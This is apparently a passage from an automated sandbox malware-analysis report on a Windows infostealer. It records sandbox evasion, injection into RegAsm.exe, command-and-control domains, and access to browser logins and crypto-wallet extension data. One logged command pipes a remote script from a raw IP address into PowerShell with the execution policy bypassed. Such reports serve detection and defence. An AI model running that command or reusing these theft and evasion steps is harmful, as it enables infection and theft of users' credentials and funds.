              Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7100, type: MEMORYSTR
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5406Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4373Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.dllJump to dropped file
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7224Thread sleep count: 5406 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7224Thread sleep count: 4373 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7300Thread sleep time: -15679732462653109s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7448Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: RegAsm.exe, 00000008.00000002.1937052782.0000000001075000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX5
              Source: RegAsm.exe, 00000008.00000002.1937052782.00000000010A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWm
              Source: RegAsm.exe, 00000008.00000002.1937052782.00000000010B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: powershell.exe, 00000005.00000002.1742888917.00000000076B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll++HF
              Source: curl.exe, 00000004.00000003.1694791209.0000000003490000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0043C1F0 LdrInitializeThunk,8_2_0043C1F0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: 5.2.powershell.exe.525556c.0.raw.unpack, Engineers.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
              Source: 5.2.powershell.exe.525556c.0.raw.unpack, Engineers.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
              Source: 5.2.powershell.exe.525556c.0.raw.unpack, Engineers.csReference to suspicious API methods: VirtualAllocEx(processInfo.ProcessHandle, num3, length, 12288, 64)
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command -
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.0.csJump to dropped file
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: powershell.exe, 00000005.00000002.1739806714.0000000006070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: rapeflowwj.lat
              Source: powershell.exe, 00000005.00000002.1739806714.0000000006070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: crosshuaht.lat
              Source: powershell.exe, 00000005.00000002.1739806714.0000000006070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sustainskelet.lat
              Source: powershell.exe, 00000005.00000002.1739806714.0000000006070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: aspecteirs.lat
              Source: powershell.exe, 00000005.00000002.1739806714.0000000006070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: energyaffai.lat
              Source: powershell.exe, 00000005.00000002.1739806714.0000000006070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: necklacebudi.lat
              Source: powershell.exe, 00000005.00000002.1739806714.0000000006070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: discokeyus.lat
              Source: powershell.exe, 00000005.00000002.1739806714.0000000006070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: grannyejh.lat
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 440000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 443000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 452000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: D42008Jump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bhgto.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/bhgto.ps1 Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command -Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.cmdline"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1090.tmp" "c:\Users\user\AppData\Local\Temp\0bqs2aon\CSCCC253661431F432090E0BD8713DD5F5.TMP"Jump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: RegAsm.exe, 00000008.00000002.1937052782.00000000010A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: RegAsm.exe, 00000008.00000002.1937052782.00000000010B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
              Source: RegAsm.exe, 00000008.00000002.1937052782.00000000010B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
              Source: RegAsm.exe, 00000008.00000002.1937052782.0000000001103000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "},{"en":"cjelfplplebdjjenllpjcblmjkfcffne","ez":"Jaxx Liberty"},{"en":"fihk
              Source: RegAsm.exe, 00000008.00000002.1937052782.00000000010B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
              Source: RegAsm.exe, 00000008.00000002.1937052782.000000000110B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
              Source: RegAsm.exe, 00000008.00000002.1937052782.00000000010B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
              Source: powershell.exe, 00000005.00000002.1746644173.00000000079E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
